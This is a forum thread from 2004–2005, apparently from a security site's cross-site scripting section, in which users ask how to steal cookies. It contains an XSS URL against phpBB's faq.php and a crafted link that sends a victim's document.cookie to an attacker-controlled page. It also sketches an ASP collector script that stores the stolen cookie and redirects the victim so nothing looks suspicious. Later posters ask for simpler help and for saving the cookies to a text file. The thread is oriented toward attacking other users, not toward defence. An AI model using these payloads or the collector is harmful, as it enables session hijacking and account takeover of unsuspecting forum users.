| 
  
    | 
	|  | Menu |  |  
     
     | 
      
       | 
        
         | 
          
           | 
						|  |  |  Home |  |  |  |  |  |  |  |  Discussions |  |  |  |  |  |  |  |  Tools |  |  |  |  |  |  |  |  Affiliates |  |  |  |  |  |  |  |  Content |  |  |  |  |  |  |  |  Info |  |  |  |  |  |  |  |  |  |  
  
    | 
	|  | User Info |  |  
     
     | 
      
       | 
        
         | 
          
           |  Membership: 
  Latest: MichaelSnaRe 
  New Today: 0 
  New Yesterday: 0 
  Overall: 9144 
 
  People Online: 
  Visitors: 94 
  Members: 0 
  Total: 94 
 |  |  |  |  |  
  
    | 
	|  | Full disclosure |  |  |  | 
  
    | 
	|  |  |  |  
        
          | 
              
                | 
                    
                      | 
                          
                            | 
	| 
	
		|  |  |  
		|  | IT Security and Insecurity Portal |  |  
 
	|  | Question about stealing cookies |  |  
	| 
	
		|  Posted: Wed Jul 21, 2004 10:26 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| Alcker |  | Beginner |  |  
  |  |  |  | Joined: Jul 21, 2004 |  | Posts: 3 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| Hi, It was proving new bug of phpBB, FAQ, and I used the example in http://www.waraxe.us/forum/viewtopic.php?t=224. I have put it of this form: 
 
  	  | Code: |  	  | http://target.com/phpBB2/faq.php?faq[0][0]=%3Cscript%3Edocument.location= 'www.web.com/cookie.php?cookie=' + window.document.cookie;%3C/script%3E | 
 
 but I do not obtain any result
  . Knows somebody to that it must? 
 Thx very much!
 
 PD: Sorry of my english,
  |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Wed Jul 21, 2004 2:12 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| r0ot |  | Regular user |  |  
  |  |  |  | Joined: Jul 18, 2004 |  | Posts: 15 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| 
 www.web.com/cookie.php <-- your site with a special page to gather cookies from a querystring and store in somewhere(db, file, etc)
 
 but theres no use if u click the link cause will send your cookies to the page... lol not the one u want
 
 Got it?
 
 If not, mail me or pvt..
 
 Best Regards
 
 r0ot
 |  |  
		| 
		
			| _________________
 
  |  |  |  
	|  |  |  | 
 
	|  |  |  |  
	| 
	
		|  Posted: Wed Jul 21, 2004 3:11 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| Alcker |  | Beginner |  |  
  |  |  |  | Joined: Jul 21, 2004 |  | Posts: 3 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| If, that page is prepared, but it does not go  (I don't know the reason), 
 Can give me an example for this bug? (If there are)
 
 Thanks!
 |  |  
		|  |  |  
	|  |  |  | 
 
	|  |  |  |  
	| 
	
		|  Posted: Wed Jul 21, 2004 6:29 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| r0ot |  | Regular user |  |  
  |  |  |  | Joined: Jul 18, 2004 |  | Posts: 15 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| sup Alck, 
 This isnt a bug, but a attack type that pretends that a user that dun know bout click on the link after he loggon a site, etc... (like a forum, so u make a post and put a link etc...)
 Lemme show a example:
 I aint no good @ php lets try some asp pages hehe
 
 @1-Your Target: www.forum.com
 
 @2-Your page that will get the cookie: www.myweb.com/cookie.asp
 
 
 You make a post on @1 that have a url like this:
 <a href="#" onClick="document.location = 'http://www.myweb.com/cookie.asp?cookieValue=' + window.document.cookie">Click here to check my new website</a>
 
 So if the user click on crafted link they will be redirected for your page wich will do the follow:
 
 1- get cookie and store it on a table
 2- redirect the user for the correct link (so don look suspicious)
 
 cookie.asp
 -------------------------
 <%
 .... (connect to the db, creates a recordset, etc..)
 dim rCookieValue
 rCookieValue = trim(request("cookieValue"))
 
 ... (insert into the db with rCookieValue)
 
 %>
 <script>
 location.href = 'rightpage.asp'
 </script>
 
 ------------------------
 
 Got it?
 |  |  
		| 
		
			| _________________
 
  |  |  |  
	|  |  |  | 
 
	|  |  |  |  
	| 
	
		|  Posted: Wed Jul 21, 2004 10:12 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| Alcker |  | Beginner |  |  
  |  |  |  | Joined: Jul 21, 2004 |  | Posts: 3 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| That already I have fact, the problem is that it does not work to me: ( 
 Thx!!
 |  |  
		|  |  |  
	|  |  
	| 
	
		|  Posted: Thu Jul 22, 2004 12:33 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| r0ot |  | Regular user |  |  
  |  |  |  | Joined: Jul 18, 2004 |  | Posts: 15 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| Np m8, anytime. 
 If u want help juz pm me
 |  |  
		| 
		
			| _________________
 
  |  |  |  
	|  |  
	|  | WTF |  |  
	| 
	
		|  Posted: Fri Jul 23, 2004 8:57 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| Cface |  | Beginner |  |  
  |  |  |  | Joined: Jul 23, 2004 |  | Posts: 3 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| Hey I'm pretty stupid so could you break it down to me. I'm new to this. |  |  
		| 
		
			| _________________
 I g0t hack3d, now it's payback!
 |  |  |  
	|  |  |  | 
 
	|  |  |  |  
	| 
	
		|  Posted: Thu May 05, 2005 12:35 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| KarachiKing555 |  | Beginner |  |  
  |  |  |  | Joined: May 05, 2005 |  | Posts: 1 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			|  	  | r0ot wrote: |  	  | sup Alck, 
 This isnt a bug, but a attack type that pretends that a user that dun know bout click on the link after he loggon a site, etc... (like a forum, so u make a post and put a link etc...)
 Lemme show a example:
 I aint no good @ php lets try some asp pages hehe
 
 @1-Your Target: www.forum.com
 
 @2-Your page that will get the cookie: www.myweb.com/cookie.asp
 
 
 You make a post on @1 that have a url like this:
 <a href="#" onClick="document.location = 'http://www.myweb.com/cookie.asp?cookieValue=' + window.document.cookie">Click here to check my new website</a>
 
 So if the user click on crafted link they will be redirected for your page wich will do the follow:
 
 1- get cookie and store it on a table
 2- redirect the user for the correct link (so don look suspicious)
 
 cookie.asp
 -------------------------
 <%
 .... (connect to the db, creates a recordset, etc..)
 dim rCookieValue
 rCookieValue = trim(request("cookieValue"))
 
 ... (insert into the db with rCookieValue)
 
 %>
 <script>
 location.href = 'rightpage.asp'
 </script>
 
 ------------------------
 
 Got it?
 | 
 
 what if i want cookies in txt file ! on my server ??
 |  |  
		|  |  |  
	|  |  |  | 
 
	| www.waraxe.us Forum Index -> Cross-site scripting aka XSS 
 
	
		| You cannot post new topics in this forum You cannot reply to topics in this forum
 You cannot edit your posts in this forum
 You cannot delete your posts in this forum
 You cannot vote in polls in this forum
 
 | All times are GMT Page 1 of 1
 
 |  |  
	|  |  
 Powered by phpBB © 2001-2008 phpBB Group
 
 
 
 
 |  |  |  |  |  |